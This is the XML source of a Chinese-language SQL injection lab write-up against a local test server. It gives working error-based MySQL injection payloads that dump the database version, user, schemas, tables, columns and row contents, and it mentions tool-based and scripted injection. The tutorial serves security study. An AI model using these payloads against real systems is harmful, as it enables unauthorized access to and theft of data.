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hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>sql注入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简介：所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。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Target：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.8.142:8080/test/sqlinsert?id=2" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.8.142:8080/test/sqlinsert?id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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判断目标站点是否存在sql注入漏洞（判断方法加入永真条件永假条件）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目标站点正常请求的返回界面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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.8.142:8080/test/sqlinsert?id=2" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.8.142:8080/test/sqlinsert?id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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68595" cy="130937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加入永真条件请求结果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97663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加入永假条件请求结果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036320"/>
            <wp:effectExtent l="0" t="0" r="165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利用漏洞获取数据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2.1 手工注入（显错）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数据库版本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concat(0x7e,version(),0x7e))) from information_schema.tables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1245870"/>
            <wp:effectExtent l="0" t="0" r="1778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t>版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~5.5.53~1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连接用户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concat(0x7e,user(),0x7e))) from information_schema.tables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260475"/>
            <wp:effectExtent l="0" t="0" r="165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t>连接用户：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root@localhost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连接数据库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concat(0x7e,database(),0x7e))) from information_schema.tables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201420"/>
            <wp:effectExtent l="0" t="0" r="1079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t>连接数据库：test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爆库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distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables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118235"/>
            <wp:effectExtent l="0" t="0" r="1143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爆其他数据库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and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)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修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>FROM information_schema.schemata LIMIT 1,1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>中limit的第一数字递加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254760"/>
            <wp:effectExtent l="0" t="0" r="1524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表：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Test   0x74657374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performance_schema：0x706572666f726d616e63655f736368656d61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Mysql：0x6d7973716c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Job:0x6a6f62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Blog:0x626c6f67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information_schema:0x696e666f726d6174696f6e5f736368656d61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爆当前数据表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distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables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188720"/>
            <wp:effectExtent l="0" t="0" r="158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爆其他数据库表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and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=库名的十六进制  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)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0340" cy="1090295"/>
            <wp:effectExtent l="0" t="0" r="228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爆其他表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concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=0x6d7973716c  limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)（原理同爆其他数据库）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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="1127125"/>
            <wp:effectExtent l="0" t="0" r="1714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爆字段（数据库，表名转换为16进制）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concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)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200150"/>
            <wp:effectExtent l="0" t="0" r="8890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爆其他字段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and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)（原理同爆其他数据库）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61610" cy="1212850"/>
            <wp:effectExtent l="0" t="0" r="215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爆内容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and(select 1 from(select count(*),concat((select (select (select concat(0x7e,id,0x7e,0x7e,name,0x7e))) from test.job limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1080135"/>
            <wp:effectExtent l="0" t="0" r="1651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2.2 工具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爆数据库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4293235"/>
            <wp:effectExtent l="0" t="0" r="8890" b="247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爆表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4522470"/>
            <wp:effectExtent l="0" t="0" r="17780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2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爆字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="3736340"/>
            <wp:effectExtent l="0" t="0" r="22860" b="228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爆内容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1135" cy="3404235"/>
            <wp:effectExtent l="0" t="0" r="12065" b="24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2.3 自己写脚本注入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爆数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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分析手工注入的语句构造构造动态查询语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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构造动态查询语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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根据页面长度分别从前和从后截断，获取报错信息中的数据库名，并保存到数组中备用</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>代码结果如下：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900680"/>
            <wp:effectExtent l="0" t="0" r="19050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t>爆表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详情看代码注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="28905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爆字段，爆内容原理同上</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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</w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS" w:cs="Comic Sans MS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Bodoni 72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odoni 72 Oldstyl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odoni 72 Smallcaps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odoni Ornaments">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80000083" w:usb1="08000048" w:usb2="14000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Bradley Hand">
    <w:panose1 w:val="00000700000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="800000FF" w:usb1="5000204A" w:usb2="00000000" w:usb3="00000000" w:csb0="20000111" w:csb1="41000000"/>
  </w:font>
  <w:font w:name="Chalkboard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halkboard SE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Damascus">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80002000" w:usb1="80000000" w:usb2="00000080" w:usb3="00000000" w:csb0="0000004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IN Condensed">
    <w:panose1 w:val="00000500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="800000AF" w:usb1="5000204A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DIN Alternate">
    <w:panose1 w:val="020B0500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="8000002F" w:usb1="10000048" w:usb2="00000000" w:usb3="00000000" w:csb0="20000111" w:csb1="4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siva Hebrew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Copperplate">
    <w:panose1 w:val="02000504000000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80000067" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="20000111" w:csb1="40000000"/>
  </w:font>
  <w:font w:name="Comic Sans MS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ari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A1A3F1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5CA1A3F1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CA1A47D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5CA1A47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CA2C836"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5CA2C83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C1F6A"/>
    <w:rsid w:val="7DDDFCE2"/>
    <w:rsid w:val="DF7BD4C5"/>
    <w:rsid w:val="EE7C9FF5"/>
    <w:rsid w:val="EFADC7DE"/>
    <w:rsid w:val="FEA7C3FF"/>
    <w:rsid w:val="FFFC1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Arial Unicode MS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2019-04-01T13:35:00Z</dcterms:created>
  <dc:creator>superzedlv</dc:creator>
  <cp:lastModifiedBy>superzedlv</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-02T14:34:52Z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2052-1.0.0.1203</vt:lpwstr>
  </property>
</Properties>
</file>